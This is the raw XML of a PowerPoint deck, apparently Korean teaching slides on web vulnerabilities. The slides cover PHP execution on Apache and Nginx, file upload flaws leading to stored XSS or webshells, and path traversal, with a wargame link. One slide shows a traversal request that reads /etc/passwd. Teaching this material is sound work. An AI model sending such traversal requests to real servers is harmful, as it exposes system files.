            <a:chOff x="1260000" y="2520000"/>
            <a:chExt cx="7884000" cy="3077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4EE98C-74E4-E518-97C9-F08C2F048066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서버사이드 웹 프로그래밍 언어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5C664E-C545-A060-3E65-CAD23D04821A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Stateless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F665C-DF8F-EBAB-D640-238ED3A50FDD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3.5cm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32px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2AFF62-B545-BDEF-5DD1-D20530F8F93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E1356A-EA68-FC6A-3D05-CF12D016C66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3DC342-34CD-DAFE-3BF6-2AF9C643842A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1440000" y="5228336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좌측으로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0.5cm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떨어진 내용 하단의 설명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18px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946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ED8C-29A0-B4F5-8054-D318C5469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214DC8-3143-74AF-E9C6-6B60160457B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Webservers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1D54F-8134-AF5F-4F2B-07B8BA5B5E36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Default behavior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다르다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B820E6-E39C-ECCE-E1DA-CDD66E17254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9902B1-DC90-21FD-C716-4C3D4F3FB949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="7884000" cy="1664775"/>
            <a:chOff x="1260000" y="2520000"/>
            <a:chExt cx="7884000" cy="166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9FF5CD-C3CD-488D-5B80-9305FDDD3D2D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Apache 	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php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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="3200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기본 실행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A0B5D6-7EBD-6D8B-C130-B457F2B142F8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Nginx		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php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 기본 실행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E6F809-3638-E7DE-33A1-7EF4C166228A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mod_php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설치시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default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426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67B87-A6CA-03BF-6385-8A615E8B4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D3865-2C0B-4E39-B8DF-1CE52C14519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Webservers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69BB6-A2C6-95E0-B2B3-8F02D626431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Nginx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3D132-95FA-4671-CEB4-75A441A94DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="6190223"/>
            <a:ext cx="42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/>
              </a:rPr>
              <a:t>Nginx wiki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흔한 실수들을 읽을 수 있다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01BECC-B414-B1E9-38A2-648A7DB368E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59F04E-C595-381D-2841-8FB8BE1D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52" y="2309400"/>
            <a:ext cx="7238895" cy="22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7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8B3E-0526-BE18-0771-CE7170D5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F4EF9-B4F9-97B5-593F-C0F264A48D10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Upload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vulnerabilty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2A125-6795-9F29-E745-EEBC086F91D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정의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A6661-97A6-BC46-FC5F-AD6AAAC3B9D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4BE157-61B7-B8D7-7654-AD8210004236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="7884000" cy="2744775"/>
            <a:chOff x="1260000" y="2520000"/>
            <a:chExt cx="7884000" cy="274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937B0-A5EE-83FD-EB17-C4D1FA57DFB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파일업로드 과정의 취약점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2242D-2784-0C23-2E99-6CB7A95613C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name, type, contents, or size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084F54-D716-AE53-A060-D4FB2A3EC854}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260000" y="468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파일 업로드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+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추가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payload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실행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CCACF3-B923-1A9D-1F63-A0DB2F6B889A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이것들에 대한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validation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없을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000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D61D-8296-1F95-25FC-0442703C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원통형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C05949-DDF6-D25A-B3A9-6C5C02EFB0D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000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0166E64E-7598-1001-ACE1-F79A4541A085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859084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182E1C9-6F00-465F-6316-0974004D81BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638168" y="1080000"/>
            <a:ext cx="1425832" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="ca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UML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D44558-03AC-0822-E3D4-9541B6C91410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1790490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79A315-53E7-D557-2AC3-4C2011B5BB4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569574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0E3E35-6494-E934-6F26-BE4563191C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348658" y="2160000"/>
            <a:ext cx="2426" cy="3993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4524B7D-8574-778B-D9F9-8B18197E5102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853365" y="2502400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52024B8-F79B-63D3-A01D-1E43506D3233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630023" y="3119414"/>
            <a:ext cx="2665909" cy="431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Another function call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82B96C-6654-1EDC-2F3C-1DF0C71A9097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853365" y="3736428"/>
            <a:ext cx="5442567" cy="43180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Utility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A97FA1BB-E448-BE3D-3E6F-E75BBEFD6BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853365" y="4353442"/>
            <a:ext cx="2665909" cy="431800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data path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DFB4C8A-873E-3FE9-FC56-4EB65A429B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853365" y="5587468"/>
            <a:ext cx="5442567" cy="431800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retq</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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9C1F7D3C-EB45-4EB5-497A-DB06E4C706AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853365" y="4970456"/>
            <a:ext cx="5442567" cy="431800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Some unimportant function</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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75EEB-9EB9-A788-AA80-BE80787F0B80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42686-86B7-0BC3-DFE3-23D8CC3F925A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="806400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FA059E-B12B-FC24-7AF4-F90BF148AB5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4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02360-E0ED-2B6B-73C1-4C477F1A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CB0C8-EFDC-1633-5E27-7BA612CAEBD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Upload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vulnerabilty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B647A-6C31-F092-67C9-C63942C61BF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이후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…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79BD52-1139-A175-6E83-9F7BD85867A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7F19B2-AFB3-4488-B241-93E060304E8B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42D6C-19EA-1DB0-804F-A914C1DCEC2C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XSS				(stored XSS)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92874F-29AE-B659-45C6-0DE06C19678F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 </a:t>
              </a:r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Webshell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EBB09F-5297-96A8-FBFA-32B284A08534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서버를 통해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shell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열린다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92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E42BB-1583-38C9-33F5-FA94C3F6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16FA5-B727-B8AE-7532-535C18B349B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Upload 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vulnerabilty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BECFF-4F04-EA1E-9F98-CC7BF87BF602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Example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8B43D2-A8CF-6887-9495-9304A25AB51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ACFE-358C-454D-1D1A-2EEFFBF5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9" y="2561994"/>
            <a:ext cx="8026561" cy="1175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8DACD-B61E-B68D-C30E-5C9052E1B146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Upload Vuln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→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Stored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XSS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9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CF474-0A13-D8C8-A226-63F86583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433B0-D35F-115F-D8E3-5107B115C15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 Traversal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29E4F-3C04-B847-CC82-5EEF207F957C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691B3F-8BD7-DD7F-FC94-893B549D13F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0D10FE-F431-A80B-6596-80C5ED5B23FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="7884000" cy="1462998"/>
            <a:chOff x="1260000" y="2520000"/>
            <a:chExt cx="7884000" cy="14629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20C3EB-AD13-09B6-FCD7-E0F45665413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나의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cat.png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웹사이트에 보여주기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5DDD62-8668-2DE7-47AA-BCAB26477532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&lt;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img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src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="/static/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img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/cat.png"&gt;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위처럼 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mysite.com/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staic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img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/cat.png</a:t>
              </a:r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을 불러온다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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.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보통 이런 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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static </a:t>
              </a:r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폴더는 해당 폴더 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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'</a:t>
              </a:r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안</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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'</a:t>
              </a:r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만 접근가능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50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F9B38-8B3B-43A2-A63D-00350618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0E02C7-D324-05BB-9502-9DA361400264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 Traversal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34BF8-8AC0-1F35-1F38-668DBECD8B9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FBE813-EE11-C642-4869-A5FAD5EC390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493E23-0585-36B6-BC90-562E83DA7C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="7884000" cy="1221910"/>
            <a:chOff x="1260000" y="2520000"/>
            <a:chExt cx="7884000" cy="12219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0EB214-6B39-C5D6-153D-AB3D3E6EA769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때론 이러한 구현도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…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4B331-2F3F-97D4-10B2-9B75EA113FBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1440000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/path/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1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request?data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=somefile.txt</a:t>
              </a:r>
              <a:endPara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1C9954-5E99-216A-0544-35A64659F389}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1440000" y="337257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  <a:cs typeface="Cascadia Mono SemiBold" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>somefile.txt</a:t>
              </a:r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Cascadia Mono SemiBold" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>는 실제 파일을 가리킴</a:t>
              </a:r>
              <a:endPara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93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6973F-55CE-F06F-0866-6A38158C2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4662AD-999B-4812-561D-831F75EF91CF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 Traversal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0331B-23B2-10C6-236B-C442ABEAF10F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55D2D4-C0AA-BB3F-32B0-F13046AEF08D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98753-0967-2F05-4E99-D7D124C93E64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/path/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request?data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=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/passwd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80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98F48-4ECF-72A8-7AB9-22B570974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2DE40-C9DC-DC6E-9174-7ED0E5A3DFF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[file-download-1]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A941B-A19B-45CA-1792-36643DF37143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3"/>
              </a:rPr>
              <a:t>dreamhack.io/wargame/challenges/37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72751-3440-DADA-F90F-6A0C42913C6F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매우 간단한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path-traversal !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A97146-EBAE-1B22-DA80-8597E327086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1465</TotalTime>
  <Words>1000</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>227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KoPub돋움체 Bold</vt:lpstr>
      <vt:lpstr>KoPub돋움체_Pro Bold</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>D2Coding</vt:lpstr>
      <vt:lpstr>Calibri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임준서</cp:lastModifiedBy>
  <cp:revision>258</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-26T06:54:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-07T04:16:29Z</dcterms:modified>
</cp:coreProperties>
</file>